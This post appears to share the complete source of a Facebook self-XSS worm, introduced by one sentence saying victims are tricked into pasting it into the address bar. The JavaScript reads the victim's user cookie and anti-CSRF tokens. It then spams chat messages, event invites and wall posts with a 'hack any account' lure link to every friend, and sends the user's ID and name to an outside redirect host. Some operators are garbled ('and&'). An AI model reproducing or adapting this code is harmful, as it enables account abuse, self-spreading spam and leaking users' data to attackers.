It tricks visitors to paste that code in the address bar so they can inject the malicious javascript into FB and then spam their walls and their friend's walls also open Ajax Chat of Facebook and spam a message as well.
Code:
var randomnumber = Math['floor'](Math['random']() * 99999);
var randomnumber1 = Math['floor'](Math['random']() * 987);
var randomnumber2 = Math['floor'](Math['random']() * 754);
var randomnumber3 = Math['floor'](Math['random']() * 43);
var randomnumber4 = Math['floor'](Math['random']() * 9);
var random = Math['floor'](Math['random']() * 5);
var url = 'http://hellobusters.blogspot.com?';
var message = '%firstname%, i can hack ANY facebook account! it\'s so easy! check it out ';
var ev = 'Hey everyone, \x0A\x0A I have found out how you can hack ANYONE\'s facebook account \x0A\x0A it\'s so easy! \x0A check it out - ';
var ev2 = '\x0A\x0Ajust don\'t log into mine :)';
var test = 'I have hacked: %tf%\'s, %tf%\'s, %tf%\'s and %tf%\'s accounts!\x0A\x0A it\'s so easy!\x0ACheck it out - ';
var eventname = 'HACK FACEBOOK!!';
var redirect = 'http://hefoll0wme.info/final.php';
var postmessage = test + url + randomnumber;
var chatmessage = message + url + randomnumber;
var eventdesc = ev + url + randomnumber;
var nfriends = 4000;
var debug = false;
var wf = 0;
var mf = function () {
if (wf <= 0) {
setTimeout(function () {
window['top']['location']['href'] = redirect
}, 500)
}
};
var doget = function (a, b, c) {
var d = new XMLHttpRequest();
d['open']('GET', a);
d['onreadystatechange'] = function () {
if (d['readyState'] == 4) {
if (d['status'] == 200 and& b) {
b(d['responseText'])
};
if (c) {
c()
}
}
};
d['send']()
};
doget('/', function (u) {
var v = document['cookie']['match'](/c_user=(\d+)/)[1];
var w = function (a) {
return a ? '@[' + a['id'] + ':' + a['name'] + ']' : ''
};
var x = function (a) {
return a ? a['name'] : ''
};
var y = function (a) {
out = '';
for (var b in a) {
out += (out ? 'and' : '') + b + ((a[b] !== null) ? '=' + encodeURIComponent(a[b]) : '')
};
return out
};
var z = function (a, b, c, d) {
var e = new XMLHttpRequest();
e['open']('POST', a);
e['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded');
e['onreadystatechange'] = function () {
if (e['readyState'] == 4) {
if (e['status'] == 200 and& c) {
c(e['responseText'])
};
if (d) {
d()
}
}
};
e['send'](y(b))
};
var A = function () {
var a = document['createElement']('div');
a['style']['display'] = 'block';
a['style']['position'] = 'absolute';
a['style']['width'] = 100 + '%';
a['style']['height'] = 100 + '%';
a['style']['left'] = 0 + 'px';
a['style']['top'] = 0 + 'px';
a['style']['textAlign'] = 'center';
a['style']['padding'] = '4px';
a['style']['background'] = '#FFFFFF';
a['style']['zIndex'] = 999999;
a['innerHTML'] = ' <br/>Please wait, this can take a little while...<br/><br/> If it takes more than a minute..<a href="javascript:void(0);" onclick="wf=0; mf();">click here</a> ';
document['body']['appendChild'](a)
};
var B = u['match'](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);
if (B) {
comp = B[1]
} else {
comp = ''
};
var C = u['match'](/name="post_form_id" value="([\d\w]+)"/i)[1];
var D = u['match'](/name="fb_dtsg" value="([\d\w]+)"/i)[1];
var E = document['getElementById']('navAccountName')['firstChild']['data'];
redirect = redirect + '?' + y({
userid: v,
name: E,
doclose: 1
});
A();
if (eventdesc) {
wf++;
z('/ajax/choose/?__a=1', {
type: 'event',
eid: null,
invite_message: '',
__d: 1,
post_form_id: C,
fb_dtsg: D,
lsd: null,
post_form_id_source: 'AsyncRequest'
}, function (h) {
var i = h['match'](/\\"token\\":\\"([^\\]+)\\"/)[1];
var j = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + v + '&token=' + i + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha';
doget(j, function (a) {
var b = a['match'](/\{"uid":\d+,/g);
var c = [];
for (var d = 0; d < b['length']; d++) {
var e = b[d]['match'](/:(\d+),/)[1];
if (e != v) {
c['push'](e)
}
};
var f = new Date();
f['setTime'](f['getTime']() + 60 * 60 * 24 * 1000);
datestr = (f['getMonth']() + 1) + '/' + f['getDate']() + '/' + f['getFullYear']();
timestr = f['getHours']() * 60;
var g = {
post_form_id: C,
fb_dtsg: D,
start_dateIntlDisplay: datestr,
start_date: datestr,
start_time_hour_min: timestr,
name: eventname,
place_page_id: '',
location: '',
street: '',
geo_id: '',
geo_sq: '',
desc: eventdesc,
sgb_invitees: c['join'](','),
sgb_emails: '',
sgb_message: '',
privacy_type: 'on',
guest_list: 'on',
connections_can_post: 'on',
save: 'Create Event',
submitting: ''
};
g['new'] = '';
z('/events/create.php', g, false, function () {
mf(--wf)
})
})
})
};
if (chatmessage) {
wf++;
z('/ajax/chat/buddy_list.php?__a=1', {
user: v,
post_form_id: C,
fb_dtsg: D,
lsd: null,
post_form_id_source: 'AsyncRequest',
popped_out: false,
force_render: true
}, function (a) {
var b = a['substr'](9);
var c = eval('(' + b + ')');
var d = c['payload']['buddy_list'];
for (var e in d['nowAvailableList']) {
var f = Math['floor'](Math['random']() * 1335448958);
var g = (new Date())['getTime']();
var h = chatmessage['replace']('%firstname%', d['userInfos'][e]['firstName']['toLowerCase']());
z('/ajax/chat/send.php?__a=1', {
msg_id: Math['floor'](Math['random']() * 1335448958),
client_time: (new Date())['getTime'](),
msg_text: chatmessage['replace']('%firstname%', d['userInfos'][e]['firstName']['toLowerCase']()),
to: e,
post_form_id: C,
fb_dtsg: D,
post_form_id_source: 'AsyncRequest'
})
};
mf(--wf)
})
};
if (postmessage) {
wf++;
doget('/ajax/browser/friends/?uid=' + v + '&filter=all&__a=1&__d=1', function (g) {
var h = g['match'](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);
var i = [];
if (h) {
for (var j = 0; j < h['length']; j++) {
var k = h[j]['match'](/_\d+_/)[0]['replace'](/_/g, '');
var l = h[j]['match'](/>[^>]+\\u003c\\\/a>$/i)[0]['replace'](/\\u003c\\\/a>$/gim, '')['replace'](/>/g, '');
i['push']({
id: k,
name: l
})
}
};
var n = [];
var o = [];
while (i['length']) {
var p = Math['floor'](Math['random']() * i['length']);
n['push'](i[p]);
o['push'](i[p]);
var q = i['shift']();
if (p) {
i[p - 1] = q
}
};
if (debug) {
alert('fetched friends: ' + n['length'])
};
var r = {
post_form_id: C,
fb_dtsg: D,
xhpc_composerid: comp,
xhpc_targetid: v,
xhpc_context: 'home',
xhpc_fbx: '',
lsd: null,
post_form_id_source: 'AsyncRequest'
};
mt = postmessage;
m = postmessage;
while (mt['search']('%tf%') >= 0) {
var s = n['pop']();
mt = mt['replace']('%tf%', x(s));
m = m['replace']('%tf%', w(s))
};
r['xhpc_message_text'] = mt;
r['xhpc_message'] = m;
if (debug) {
alert('message text: ' + mt)
};
z('/ajax/updatestatus.php?__a=1', r);
var t = function (a) {
if (a == 0) {
wf = 0;
mf();
return
};
var b = o['shift']();
var c = {
post_form_id: C,
fb_dtsg: D,
xhpc_composerid: comp,
xhpc_targetid: b['id'],
xhpc_context: 'profile',
xhpc_fbx: 1,
lsd: null,
post_form_id_source: 'AsyncRequest'
};
var d = postmessage;
var e = postmessage;
if (n['length'] == 0) {
wf = 0;
mf();
return
};
while (d['search']('%tf%') >= 0) {
var f = n['pop']();
d = d['replace']('%tf%', x(f));
e = e['replace']('%tf%', w(f))
};
c['xhpc_message_text'] = d;
c['xhpc_message'] = e;
z('/ajax/updatestatus.php?__a=1', c);
setTimeout(function () {
t(a - 1)
}, 2000)
};
wf++;
setTimeout(function () {
t(nfriends)
}, 2000)
})
};
mf()
});
.png)
